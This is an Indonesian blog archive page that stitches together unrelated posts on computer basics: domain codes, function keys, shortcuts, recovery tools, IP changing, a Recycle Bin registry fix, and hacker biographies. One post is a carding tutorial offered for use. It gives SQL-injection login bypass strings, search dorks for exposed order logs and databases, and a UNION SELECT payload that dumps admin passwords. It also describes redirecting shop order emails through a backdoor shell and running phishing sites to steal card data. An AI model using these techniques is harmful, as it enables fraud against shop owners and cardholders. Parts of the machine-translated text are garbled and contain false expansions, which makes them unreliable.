Archive

Hosting Unlimited Indonesia
------------------------------------------------------

HOSTING MURAH

Hosting Unlimited Indonesia

Teman

Hosting Unlimited Indonesia

CARA CEPAT PASANG LINK OTOMATIS DI BLOGS



Cara Cepat Pasang Link Otomatis Di blogs

Masih di Variasi Blogger share Cara Cepat Pasang Link Otomatis Di blogs cekidot , Silahkan sobat kunjungi situsnya blenza linkies , Silahkan register terlebih dahulu seperti gambar di bawah ini

Cara Cepat Pasang Link Otomatis Di blogs

Jika sudah silahkan periksa email sobat untuk memverifikasi kemudian sobat akan di arahkan seperti gambar di bawah ini untuk log in

Cara Cepat Pasang Link Otomatis Di blogs

Silahkan sobat log in dengan account yang telah sobat buat , jika sudah log in , kemudian sobat klik wizard seperti gambar di bawah ini

Cara Cepat Pasang Link Otomatis Di blogs

Nah disitu untuk Step 1. Choose your server... pilih Blogger
                                    2. Choose your widget... If you're not sure what type of widget is best for you and your blog, click here to read the FAQ. silahkan pilih Original Auto-Linkies (click for preview)
jangan lupa centang bagian Remember these selections for next time.   Previously remembered settings can be cleared in widget options.

jika sudah semua silahkan klik Generate Code sobat akan di arahkan seperti gambar di bawah ini

Cara Cepat Pasang Link Otomatis Di blogs

Silahkan sobat copy paste script yang telah di berikan oleh Mister Linky dengan cara Log in ke blogs sobat >> klik Rancangan >> klik posting silahkan paste disitu atau bisa juga di halaman baru blogs sobat , Simpan dan Lihat Hasilnya , Semoga Bermanfaat 

HAL-HAL Dasar Komputer



Domain geografis negara-negara di dunia

at = Austria
au = Australia
ch = Swiss
dk = Denmark
ee = Eslandia
es = Spanyol
id = Indonesia
in = India...
pl = Polandia
pt = Portugal
se = Swedia
uk = Ingris
us = Amerika
cl = Cile
ir = Irlandia
de = Jerman
be = Belgia
bg = Bulgaria
br = Brazil
fi = Firlandia
fr Perancis
jp = Jepang



Jenis jenis DNS :

Sch : Sekolah
com : Perusahaan komersial
edu : Badan pendidikan
gov : Lembaga pemerintahan non militer
mil : Militer
net : Jaringan
org : Organisasi lainnya
int : Organisasi Internasional
ac : Badan pendidikan



Apa F1 melalui tombol F12 ?
Kegunaan Tombol F1 -F12 pada keyboard

F1

Hampir selalu digunakan sebagai tombol bantuan , hampir setiap program akan membantu membuka layar saat tombol ini yang ditekan .
Masukkan CMOS Setup.
Windows Key + F1 akan membuka Microsoft Windows pusat bantuan dan dukungan .
Buka Task Pane .
...
F2

Pada Windows mengganti nama icon yang disorot , file, atau folder di semua versi Windows.
Alt + Ctrl + F2 membuka jendela dokumen Microsoft Word.
Ctrl + F2 menampilkan pratinjau cetak jendela Microsoft Word.
Cepat mengubah nama file atau folder yang dipilih .
Masukkan CMOS Setup.

F3

Seringkali membuka fitur pencarian untuk berbagai program termasuk Microsoft Windows ketika pada Windows Desktop ..
Dalam baris perintah MS - DOS atau Windows F3 akan mengulangi perintah terakhir .
Shift + F3 akan mengubah teks dalam Microsoft Word dari atas ke bawah scroll atau huruf besar pada awal setiap kata .
Windows Key + F3 membuka jendela menemukan Lanjutan di Microsoft Outlook .
Buka Mission Control di komputer Apple yang menjalankan Mac OS X.

F4

Buka jendela find in Windows 95 ke XP .
Buka address bar pada Windows Explorer dan Internet Explorer .
Ulangi aksi terakhir dilakukan ( Word 2000 + )
Alt + F4 akan menutup jendela program sedang aktif di Microsoft Windows.
Ctrl + F4 akan menutup jendela yang terbuka pada jendela yang sedang aktif dalam Microsoft Windows.

F5

Dalam semua modern browser Internet akan menekan F5 refresh atau reload halaman atau dokumen jendela .
Buka menemukan, mengganti , dan pergi ke jendela Microsoft Word.
Mulai tayangan slide dalam PowerPoint .

F6

Pindahkan kursor ke Address bar di Internet Explorer , Mozilla Firefox , dan kebanyakan browser Internet lainnya .
Ctrl + Shift + F6 terbuka buka ke dokumen Microsoft Word.

F7

Biasanya digunakan untuk periksa ejaan dan tata bahasa memeriksa dokumen program Microsoft seperti Microsoft Word, Outlook , dll
Shift + F7 menjalankan cek Thesaurus pada kata disorot .
Ternyata pada sisipan browsing di Mozilla Firefox .

F8

Tombol fungsi yang digunakan untuk masuk ke menu startup Windows, umumnya digunakan untuk mengakses Windows Safe Mode .

F9

Pengukuran yang Membuka toolbar dalam Quark 5.0 .
Dengan Mac OS 10.3 atau yang lebih baru menunjukkan semua yang terbuka pada Windows.
Menggunakan tombol Fn dan F9 pada saat yang sama akan membuka Mission Control di komputer Apple yang menjalankan Mac OS X.

F10

Pada Microsoft Windows mengaktifkan menu bar di aplikasi yang terbuka .
Shift + F10 adalah sama dengan klik kanan pada icon yang disorot, file, atau link Internet .
Akses partisi pemulihan tersembunyi pada HP dan komputer .
Masukkan CMOS Setup.
Dengan Mac OS 10.3 atau yang lebih baru menunjukkan semua jendela terbuka untuk program aktif .

F11

Modus layar penuh dalam semua modern browser Internet .
Ctrl + F11 sebagai komputer mulai mengakses partisi pemulihan tersembunyi pada banyak komputer Dell .
Akses partisi pemulihan tersembunyi pada eMachines , Gateway , dan Lenovo komputer .
Dengan Mac OS 10.4 atau menyembunyikan semua jendela yang terbuka dan menunjukkan Desktop .

F12

Buka Simpan sebagai jendela Microsoft Word.
Shift + F12 menyimpan dokumen Microsoft Word.
Ctrl + Shift + F12 mencetak dokumen di Microsoft Word .
Preview halaman dalam Microsoft Expression Web
open Firebug .
Dengan Apple menjalankan Mac OS 10.4 atau yang lebih baru F12 akan menampilkan atau menyembunyikan Dashboard .

F13 - F24

Komputer IBM Awal juga memiliki keyboard dengan F13 melalui tombol F24 . Namun, karena keyboard ini tidak lagi digunakan mereka tidak tercantum pada saat ini .



4 Data Gratis Recovery Tools
1 . Recuva
Ini adalah perangkat lunak pemulihan data gratis dari Piriform , tim yang sama yang memberi kita CCleaner dan defragler .
Hal ini sederhana dan mudah digunakan .
Mampu memulihkan file dihapus dari Recylce bin , kartu memori dan perangkat portabel lainnya .
Ini juga memiliki modus scan mendalam di mana kesempatan Anda untuk mendapatkan kembali data yang lebih... baik .
Mengenai kompatibilitas , berjalan jendela upto good 7 32-bit . Belum diuji dengan windows 8 .
Hal ini juga tersedia sebagai versi portable yaitu Anda dapat menjalankannya langsung dari file yang didownload yang pasti memiliki keuntungan !
2 . Pandora Recovery
Hal ini juga mampu memulihkan file dihapus secara permanen dari hard drive Anda .
Memiliki mode preview di mana Anda dapat melihat gambar dan teks yang dapat diperoleh kembali dari harddisk Anda .
Ada sebuah opsi bernama sebagai pemindaian permukaan di mana Anda dapat mencari file dari partisi rusak atau diformat ulang .
Ada juga seorang ahli membantu yang dapat memandu Anda melalui proses pemulihan .
Hal ini kompatibel untuk windows 7
3 . Tokiwa Data Recovery
Ini adalah yang paling mudah untuk menggunakan alat pemulihan data yang tersedia saat ini .
Memiliki antarmuka yang sederhana dengan beberapa pilihan tapi kuat .
Sebuah tombol scan untuk memindai file dipulihkan .
Anda juga dapat mencari file tertentu dengan mengetikkan nama file di kotak pencarian .
Ada juga tombol yang menghapus secara permanen dapat menghapus file dipulihkan dari setiap partisi kecuali drive dimana sewaktu OS anda terinstal .
4 . free Undelete
Ini hanyalah alat sederhana untuk pemulihan data.
Mendukung berbagai sistem file seperti NTFS 1.0 , 2.0 NTFS , FAT12 , FAT16 dan FAT32 .
Tersedia baik dalam portable serta versi installer .



BASIC CTRL + KEYBOARD SHORTCUTS
************************
Ctrl + z = undo
Ctrl + x = cut
Ctrl + c= copy
Ctrl + v= paste
Ctrl + b= bold
Ctrl + n= new window
Ctrl + a= select all
Ctrl + s =save...
Ctrl + y =redo
Ctrl + u =undrill
Ctrl + p =print
Ctrl + esc =start menu
Ctrl + w=close window
Ctrl + r=refresh
Ctrl + t= new tab
Ctrl +n =open new document
Ctrl + tab=moved to new window





** Hack Untuk Mengubah Alamat IP Anda **
1 . Klik " Start"
2 . Klik " Run "
3 . Ketik " cmd " dan tekan ok Anda sekarang harus pada
MSDOS prompt screen .
4 . Ketik " ipconfig / release " hanya seperti itu , dan tekan tombol "enter "
5 . Ketik " exit " dan tinggalkan prompt
6 . Klik kanan pada " Network Places " atau " My Network Places "
pada desktop Anda .
7 . Klik pada " properties You should n...ow be on a screen with something titled " Local Area Connection " , atau
sesuatu yang dekat dengan itu , dan , jika Anda memiliki jaringan
tersambung , semua jaringan Anda yang lain .
8 . Klik kanan pada " Local Area Connection " dan klik
" properties"
9 . Double-klik pada " Internet Protocol ( TCP / IP ) " dari
daftar di bawah tab "General"
10 . Klik pada " Gunakan alamat IP berikut " di bawah
" General " tab 11 . Buat alamat IP (Terserah agan2 semua ) .
12 . Tekan " Tab " dan secara otomatis harus mengisi
" Subnet Mask " Bagian dengan nomor standar .
13 . Tekan " Ok " Button here
14 . Tekan " Ok " Button Again
Anda sekarang harus kembali ke " Local Area Connection "
layar .
15 . Klik kanan kembali pada " Local Area Connection " dan pergi ke
properti lagi .
16 . Kembali ke " TCP / IP " Pengaturan
17 . Kali ini , pilih " Mendapatkan alamat IP secara otomatis "
tongue.gif
18 . Tekan " Ok "
19 . Tekan " Ok " lagi
20 . Anda sekarang memiliki alamat IP baru Dengan sedikit latihan ,
Anda dapat dengan mudah mendapatkan proses ini turun sampai 15 detik .



UNTUK MENGEMBALIKAN RECYCLE BIN ANDA

Recycle Bin digunakan untuk menyimpan file-file yang tidak perlu atau folder . Beberapa orang bertanya tentang masalah ini bahwa bagaimana mereka bisa mendapatkan kembali recycle bin mereka setelah menghapusnya pada windows XP .
Anda dapat menggunakan metode ini untuk mendapatkan kembali recycle bin .
Catatan penting .
Untuk tujuan ini, Anda harus memodifikasi... Registry. Hal ini sangat direkomendasikan bahwa jika Anda memiliki pengetahuan dasar registri maka Anda dapat mencobanya . Jika beberapa masalah serius mungkin terjadi jika Anda memodifikasi Registry salah. Sekarang mari kita coba . Ikuti langkah-langkah ini dan hati-hati untuk mengedit registri untuk membuat ikon Recycle Bin muncul kembali pada desktop Anda .

i . Klik START dan kemudian klik RUN
ii . Sekarang ketik " regedit " dan kemudian klik OK .
iii . Cari kunci registri berikut
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsfot \ windows \ Lancar
versi \ Explorer \ Desktop \ namespace
iv . Klik kanan kunci registri yang terletak di nomor ( iii ) , Point baru dan kemudian klik tombol .
v Sekarang Jenis { 645FF040 - 5081 - 101B - 9F08 - 00AA002F954E } dan tekan Enter .
vi . Setelah klik ini baru { 645FF040 - 5081 - 101B - 9F08 - 00AA002F954E } kunci.
vii . Di sebelah kanan , menggunakan mouse Anda untuk klik dua kali entri default .
viii . Anda akan melihat "Edit kotak dialog string" . Ketik Recycle Bin pada kotak Data nilai dan akhirnya klik OK .
ix . Sekarang tutup Editor registri dan periksa desktop Anda .
x . Anda akan melihat ikon recycle Bin di dinding desktop Anda .






❖ Hacker sejati itu


❖ Hacker sejati itu

Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos sistem keamanan seseorang telah menjadi hacker, sama seperti jika dikatakan bahwa mengontakan mobil membuat seseorang langsung menjadi ahli mesin.
Saya hebat karena belajar, saya tahu karena membaca, saya mahir karena praktik (try and error). Trust me, Knowledge Is King.
Seorang yang di puja didunia hacker, yaitu mereka telah menulis program besar yang berkemampuan tinggi dan di butuhkan dimana-mana, lalu memberikan program itu secara cuma-cuma dan sekarang program itu telah di pakai setiap orang.
Hacker tidak bersedia menghabiskan waktu dengan orang-rang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian, terutama keahlian dalam dunia hacking dan sekuritas, juga di keahlian dibidang apapun.
Skill seorang hacker bukan dilihat dari besarnya perkataan, melainkan dilihat dari suatu hasil besar yang telah dibuatnya.
Seorang hacker harus siap di hack, Jika tidak siap di hack jangan jadi hacker.
Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat tools yang perlu anda kuasai sebelum orang bahkan bisa berfikir memanggil anda hacker.

Trust me, Expertise Is Important
Berfikirlah sebagai seorang pemula, maka dunia ini akan terbuka bagimu.
Jika memang membaca adalah hal yang paling membosankan dalam belajar, maka carilah seorang tutor. Trust me, Tutor will guide you to learn!
Saya memang tidak pandai dibidang hacking, saya juga tidak pernah mendalami bidang hacking itu sendiri, tapi saya mendapatkannya ketika saya belajar sekuritas.
Trust me, Security Is Better.
Trust me, Reading will make dreams come true!

carding


kembali lagi saya buad artikel Ini berhubungan dengan carding loh, yang pasti anda udah tau semua dengan apa itu carding. Ini hal yang sangat menarik untuk di bahas dalam masalah ini.
Ada beberapa teknik yang perlu anda ketahui tentang bagaimana itu carding. Pertama, gw akan jelaskan beberapa teknik menarik yang patut anda pelajari.
Udah lom ne gw ceramahnya..
Wkwkwkw.. Oke dah lanjut ya kita mulai. Lets Go:



1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic # Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin.

Adapun code user dan password itu diantaranya:
admin:’ or a=a– admin:’ or 1=1– user:’ or 1=1– admin:’ or 1=1– dsb

Contoh: Silakan cari di google
keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp
Misal target : http://www.namasitusnya.com/shop/admin/shopadmin.asp
Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil

2. Shopping Order Log – Informasi Log Order di Server # Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server.
Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb.
Nah bagaimana mendapatkan informasi ini di web target.
Itu tergantung dari imajinasi anda untuk menemukannya.
Biasanya ini di server berbasis .cgi, .asp, .php, dsb.

Contoh: Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi” atau inurl:order filetype:txt / inurl:order filetype:log dsb.

Misal target: http://www.namasitusnya.net/shop/admin/log/order.log http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt Selamat menemukan

3. Database Information – Database Source Location – Database Path # Pada bagian ini, kita mendapatkan informasi lokasi database.
Sehingga kita bisa mendownload database yang ada di server.
Kebanyakan yang include di server .mdb.
Contoh: Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb” atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^

4. SQL Injection Advanced Shop Vulnreabilty # Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection.
Menggunakan sedikit kombinasi: union, join, select, update, dsb.
Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh: Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb http://www.targetnya.com/shop/product_details.php?item_id=13 Ganti tulisan itu dengan : products_rss.php?category_id=1' UNION SELECT concat(login,char(58) ,password),0 FROM va_admins — /* jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1 ‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /* dah kalo ada yang errornya kaya gini : [color="Red"]DB ERROR 1064[/color] [code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team. The details of the error are shown below. Please quote this in any correspondance regarding this problem. Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url] %20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/* Referrer URL: Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1 [/code] Nah klo udah jangan lupa decrypt passwordnya ya 5. Admin Shop Send Mail Order # Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya. Contoh: Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.

Misal target: [url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]

Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti: var $dbtype = ‘mysql’; var $host = ‘localhost’; var $user = ’shop24_admin’; var $db = ’shopsex_site’; var $mailer = ‘mail’; var $ordermailsendto = ‘ben@netboost.com.au‘; Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”. Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..


6. Phising & Scaming # Tram..

Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni..
Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin.
Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam.
Coba klo di web inject, kan agak runyam.
kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin.
So u pasti tahu donk gmn caranya. Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe.
Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner. Nah gitu ajah dech dari gw, selamat berselancar dah, Segala tindak tanduk jadi tanggung jawab loe sendiri Jadikanlah ilmu sebagai pembelajaran yang berharga dalam

Bentuk-bentuk istilah pada komputer Tahap Dasar



Bentuk-bentuk istilah pada komputer




* HTTP - Hyper Text Transfer Protocol.
* HTTPS - Hyper Text Transfer Protocol Secure.
* IP - Internet Protocol.
* URL - Uniform Resource Locator.
* USB - Universal Serial Bus.
* VIRUS - Vital Information Resource Under Seized.
* 3G - 3rd Generation....
* GSM - Global System for Mobile Communication.
* CDMA - Code Divison Multiple Access.
* UMTS - Universal Mobile Telecommunication
System.
* SIM - Subscriber Identity Module.
* AVI = Audio Video Interleave
* RTS = Real Time Streaming
* SIS = Symbian OS Installer File
* AMR = Adaptive Multi-Rate Codec
* JAD = Java Application Descriptor
* JAR = Java Archive
* JAD = Java Application Descriptor
* 3GPP = 3rd Generation Partnership Project
* 3GP = 3rd Generation Project
* MP3 = MPEG player lll
* MP4 = MPEG-4 video file
* AAC = Advanced Audio Coding
* GIF = Graphic InterchangeableFormat
* JPEG = Joint Photographic ExpertGroup
* BMP = Bitmap
* SWF = Shock Wave Flash
* WMV = Windows Media Video
* WMA = Windows Media Audio
* WAV = Waveform Audio
* PNG = Portable Network Graphics
* DOC = Document (Microsoft Corporation)
* PDF = Portable Document Format
* M3G = Mobile 3D Graphics
* M4A = MPEG-4 Audio File
* NTH = Nokia Theme (series 40)
* THM = Themes (Sony Ericsson)
* MMF = Synthetic Music Mobile Application File
* NRT = Nokia Ringtone
* XMF = Extensible Music File
* WBMP = Wireless Bitmap Image
* DVX = DivX Video
* HTML = Hyper Text Markup Language
* WML = Wireless Markup Language
* CD - Compact Disk.
* DVD - Digital Versatile Disk.
* CRT - Cathode Ray Tube.
* DAT - Digital Audio Tape.
* DOS - Disk Operating System.
* GUI - Graphical User Interface.
* HTTP - Hyper Text Transfer Protocol.
* IP - Internet Protocol.
* ISP - Internet Service Provider.
* TCP - Transmission Control Protocol.
* UPS - UninterruptiblePower Supply.
* HSDPA - High Speed Downlink Packet Access.
* EDGE - Enhanced Data Rate for GSM [Global System for Mobile
Communication] Evolution.
* VHF - Very High Frequency.
* UHF - Ultra High Frequency.
* GPRS - General Packet Radio Service.
* WAP - Wireless Application Protocol.
* TCP - Transmission Control Protocol .
* ARPANET - Advanced Research Project Agency Network.
* IBM - International Business Machines.
* HP - Hewlett Packard.
* AM/FM - Amplitude/ Frequency Modulation.
* WLAN - Wireless Local Area Network.

Top 10 hacker yang paling terkenal

Kami menyajikan sepuluh hacker paling terkenal.
Kevin Mitnick: Top 10 hacker yang paling terkenal
Mantan gadungan 'hacker poster-boy': Kevin Mitnick 
1. Kevin Mitnick
Kevin Mitnick parlayed pengalamannya hacking ke karir sebagai konsultan keamanan komputer.
Mungkin hacker paling terkenal dari generasinya, Mitnick telah digambarkan oleh Departemen Kehakiman AS sebagai "komputer kriminal paling dicari dalam sejarah Amerika Serikat." The gadungan 'poster hacker boy' diduga menyusup ke sistem komputer dari beberapa teknologi top dunia dan perusahaan telekomunikasi termasuk Nokia, Fujitsu, dan Motorola. Setelah pengejaran yang sangat dipublikasikan oleh FBI, Mitnick ditangkap pada tahun 1995 dan setelah mengaku beberapa tuduhan sebagai bagian dari kesepakatan pembelaan-menawar, dia menjalani hukuman penjara lima tahun. Ia dibebaskan bersyarat pada tahun 2000 dan saat ini mengelola sebuah konsultan keamanan komputer. Dia tidak mengacu pada aktivitas hacking sebagai 'hacker' dan bukannya memanggil mereka 'social engineering'.
Hacker komputer yang paling terkenal sepanjang masa, Kevin Mitnick memulai karir hacking pada usia 12, pengadaan tiket sendiri meninju dan menggali mentransfer terpakai slip naik sistem bus Los Angeles secara gratis.Hal ini kemudian menyebabkan hacking sistem Digital Equipment Corp untuk melihat kode sumber, dan mendapatkan akses ke sistem perusahaan seperti Motorola, Nokia, dan IBM. Pada jangka selama bertahun-tahun, Mitnick adalah komputer hacker yang paling dicari oleh FBI pada saat penangkapannya pada tahun 1995, dan telah diduga hacking Pentagon dan agen bahkan kawat-penyadapan NSA. Mitnick menjabat lima tahun penjara dan kemudian menulis sebuah buku tentang Hacking berjudul The Art of Deception pada tahun 2002. Mitnick mengaku ia menjabat waktu di sel isolasi karena pejabat takut ia bisa memulai perang nuklir hanya dengan bersiul ke telepon umum. Kebenaran dipertanyakan ini, tentu saja, hanya menambah perawakan legendaris Mitnick. Seperti banyak hacker pensiunan, Mitnick kini mengelola sebuah lembaga konsultasi keamanan cyber, Mitnick Security Consulting LLC.

2. Kevin Poulson/Kevin Poulsen
Kevin Poulsen pernah dimanipulasi saluran telepon stasiun radio untuk memenangkan Porsche baru dalam kontes.
Poulson pertama menjadi terkenal dengan hacking ke saluran telepon dari stasiun radio Los Angeles KIIS-FM, memastikan ia akan menjadi penelpon 102 dan dengan demikian pemenang kompetisi stasiun berjalan di mana hadiah adalah Porsche. Di bawah alias hacker Gelap Dante, ia juga diaktifkan kembali nomor telepon Halaman Kuning pendamping tua untuk seorang kenalan yang kemudian berlari lembaga pendamping virtual. Pihak berwenang mulai mengejar Poulson dengan sungguh-sungguh setelah ia meng-hack ke dalam database investigasi federal. Poulson bahkan muncul di televisi AS Unsolved Mysteries sebagai buronan - meskipun semua saluran telepon 1-800 untuk program misterius jatuh. Sejak dibebaskan dari penjara, Poulson telah diciptakan kembali dirinya sebagai seorang jurnalis.
Seorang cracker komputer terkenal berbalik wartawan, Poulsen dikenal dengan pegangan nya gelap Dante dan melepas beberapa stunts profil tinggi pada hari-hari awal komputasi. Selain menciptakan sebuah lembaga pendamping virtual melalui Yellow Pages untuk pembantu, Poulsen dikomandoi semua saluran telepon untuk KIIS-FM di Los Angeles, meyakinkan bahwa ia akan menjadi penelpon 102 untuk menerima hadiah dari Porsche 944 S2.Setelah melayani lima tahun penjara, Poulsen telah diciptakan kembali dirinya, menjabat sebagai editor berita untuk Wired.com.
3. Adrian Lamo
Adrian Lamo adalah bersembunyi pada 2011 untuk perannya dalam skandal WikiLeaks.
Adrian Lamo bernama 'the homeless hacker' untuk kegemarannya untuk menggunakan coffee shop , perpustakaan, dan warung internet sebagai basis nya untuk hacking. Sebagian besar kegiatan terlarang itu terlibat membobol jaringan komputer dan kemudian melaporkan kerentanan mereka terhadap perusahaan-perusahaan yang dimiliki mereka. Klaim terbesar Lamo untuk ketenaran datang ketika ia masuk ke intranet New York Times dan menambahkan namanya ke database mereka ahli. Dia juga menggunakan LexisNexis kertas account untuk mendapatkan akses ke rincian rahasia mata pelajaran yang tinggi-profil. Lamo saat ini bekerja sebagai jurnalis.
Ditangkap pada tahun 2003, Adrian Lamo pertama menjadi terkenal untuk hacking ke dalam jaringan Yahoo, Microsoft dan New York Times . Lamo memasuki sorotan lagi pada tahun 2010 untuk mengubah di Army Spesialis Bradley Manning selama urusan WikiLeaks. Lamo masih bersembunyi pada 2011 karena ancaman dan dampak dari skandal WikiLeaks.
4. Stephen Wozniak
Terkenal sebagai co-founder Apple, Stephen "Woz" Wozniak mulai nya 'white-hat' hacking karir dengan 'telepon phreaking' - slang untuk melewati sistem telepon. Sementara belajar di University of California ia membuat device untuk temannya bernama 'kotak biru' yang memungkinkan mereka untuk membuat panggilan telepon gratis jarak jauh. Wozniak diduga menggunakan satu perangkat tersebut untuk memanggil Paus. Dia kemudian keluar dari universitas setelah ia mulai bekerja pada sebuah ide untuk sebuah komputer. Ia membentuk Apple Computer bersama temannya Steve Jobs dan sisanya, seperti kata mereka, adalah sejarah.
hacker dan kemanusiaan
Merancang Life
Man masih merupakan komputer yang paling luar biasa dari semua.
John F. Kennedy
Anda tahu Anda telah tiba ketika Anda dapat pergi dengan satu nama seperti Madonna atau Cher. Di antara pemilik komputer pribadi awal, Steve Wozniak (usia empat puluh dua) hanya dikenal sebagai Woz. Namanya dikaitkan dengan sihir dan romantisme dari Apple I dan Apple II karena ia dan Steve Jobs adalah legendaris "dua orang di garasi" yang memulai Apple Computer.
Tiga orang yang bertanggung jawab atas keberhasilan awal Apple: Steve Jobs, Mike Markkula, dan Woz. Jobs adalah pemimpin karismatik yang datang dengan ide menjual preassembled, komputer siap digunakan. Mike Markkula, seorang investor kaya dan setengah pensiun yang membuat jutaan nya di Intel, pernah bekerja untuk Apple tetapi menyediakan modal, kredibilitas, dan industri know-how. Woz adalah insinyur. Dia suka untuk membangun komputer keren untuk mengesankan para anggota Homebrew Computer Club, sebuah kelompok eklektik murtad tertarik pada mikroprosesor dan komputer.
Bab ini adalah tentang hari-hari awal Apple dan memilih hidup Anda bekerja. Woz dan saya bertemu untuk wawancara ini di kantor-kantor di Los Gatos, California.Lab akan menjadi cara yang lebih baik untuk menggambarkan fasilitas ini, karena macet dengan komputer Macintosh dan printer serta peralatan audio dan video. Ibu hampir siapa pun akan pingsan di kekacauan di sini, dan ayah hanya tentang siapa pun akan pingsan pada biaya peralatan tergeletak di sekitar.

Mulai dari Apple Computer

Ketika Woz sedang merancang Apple I, dia tidak pernah berpikir bahwa produk tersebut akan meluncurkan sebuah perusahaan bernilai miliaran dolar. Dia hanya bersenang-senang-menerapkan keahlian teknik untuk membangun gadget untuk dirinya dan teman-temannya.
Apple kecelakaan total sejarah. Aku sedang membangun proyek seperti terminal untuk Hewlett-Packard dan mendengar tentang klub memulai. Saya merancang Apple I di ruang tertutup di lab saya di Hewlett-Packard dan di apartemen saya di Cupertino. Aku hanya membangun itu untuk diri sendiri dan mulai memamerkannya di Club [Homebrew Computer Club] dengan melewati keluar skema. Rasanya seperti proyek ilmiah saya pamer ke teman-teman. Hal itu tidak dilakukan untuk menjadi produk yang akan dijual.Steve Jobs datang ke salah satu pertemuan klub, dan ia melihat bahwa orang-orang yang tertarik dalam skema saya. Dia datang dengan ide-ia telah bekerja surplus-toko elektronik-Mengapa kita tidak membuat papan PC seharga $ 20 dan menjualnya untuk $ 40? Aku tidak tahu apakah kita akan membuat uang kami kembali, tapi akhirnya aku pergi bersama dengan idenya. Ketika Anda masih muda, itu adalah rapi, ide mendebarkan bahwa Anda bisa memiliki perusahaan. Itu tidak harus uang.
Kami tidak pernah tahu persis apa langkah selanjutnya adalah. Apa yang benar di depan Anda jelas, tapi Anda tidak pernah bisa melihat tiga, empat, atau tujuh langkah di depan. Kami pikir kami akan menjual papan PC seharga $ 40, dan mungkin kita akan menghasilkan $ 1.000 kembali. Kami akhirnya mendapatkan pesanan sebesar $ 500 komputer segera, tapi itu adalah kejutan total.
Semua desain dan semua perangkat lunak untuk Apple I adalah ide-ide saya. The elektronik fitur-berapa banyak chip melakukan apa dan sampai ke berapa banyak slot-semua pilihan saya. Apa komputer tampak seperti, bagaimana akan dijual, dan bagaimana hal itu akan disampaikan kepada orang-orang Steve. Bekerja dengan Mike Markkula, ia datang dengan ide-ide untuk membuat Apple II perangkat dijual.
Mengapa Woz dan Jobs menyebabkan lahirnya industri yang paling penting karena mobil, sementara perusahaan lain melewatkannya? Mungkin karena Woz dan Jobs adalah beatniks dan hippie-mencoba untuk memulai sebuah revolusi, tidak membangun sebuah industri.
